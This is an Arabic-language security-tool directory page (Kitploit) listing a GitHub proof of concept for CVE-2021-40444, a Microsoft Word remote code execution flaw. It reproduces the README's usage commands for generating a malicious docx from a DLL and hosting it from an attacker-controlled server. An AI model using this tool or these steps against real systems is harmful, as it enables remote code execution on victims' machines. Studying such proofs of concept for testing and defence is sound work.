Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-40444 | Kitploit
أدوات/GitHubGitHub/hqdat809/cve-2021-40444
توليد الحمولةالاستغلالالهندسة العكسيةاستغلال تطبيقات الويبتحليل البرمجيات الخبيثةاختبار الاختراق
GitHubhqdat809/cve-2021-40444

CVE-2021-40444

عرض المستودع
1منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-40444 PoC

مولّد مستندات docx خبيثة لاستغلال CVE-2021-40444 (تنفيذ التعليمات البرمجية عن بُعد في Microsoft Office Word)

تم إنشاء هذا السكريبت بناءً على بعض الهندسة العكسية للعينة المستخدمة في الهجمات الفعلية: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (ملف docx)

يجب تثبيت lcab أولاً (sudo apt-get install lcab)

راجع REPRODUCE.md للحصول على خطوات إعادة الإنتاج اليدوية

إذا لم يعمل ملف cab الذي تم إنشاؤه، فجرّب توجيه عنوان URL الخاص بـ exploit.html إلى calc.cab

الاستخدام

أولاً، قم بإنشاء مستند docx خبيث باستخدام ملف DLL، يمكنك استخدام الملف الموجود في test/calc.dll والذي يقوم فقط بتشغيل calc.exe عبر استدعاء system()

python3 exploit.py generate test/calc.dll http://<SRV IP>

Document generation

بمجرد إنشاء ملف docx الخبيث (سيكون في مجلد out/)، يمكنك إعداد الخادم:

sudo python3 exploit.py host 80

Server

أخيرًا، جرّب ملف docx على جهاز افتراضي يعمل بنظام Windows:

Pop Calc

تنزيل الأداة